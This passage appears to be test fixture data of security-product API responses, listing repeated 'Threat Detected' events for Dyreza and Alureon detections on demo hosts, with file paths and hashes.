Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local 
Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and 
Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat 
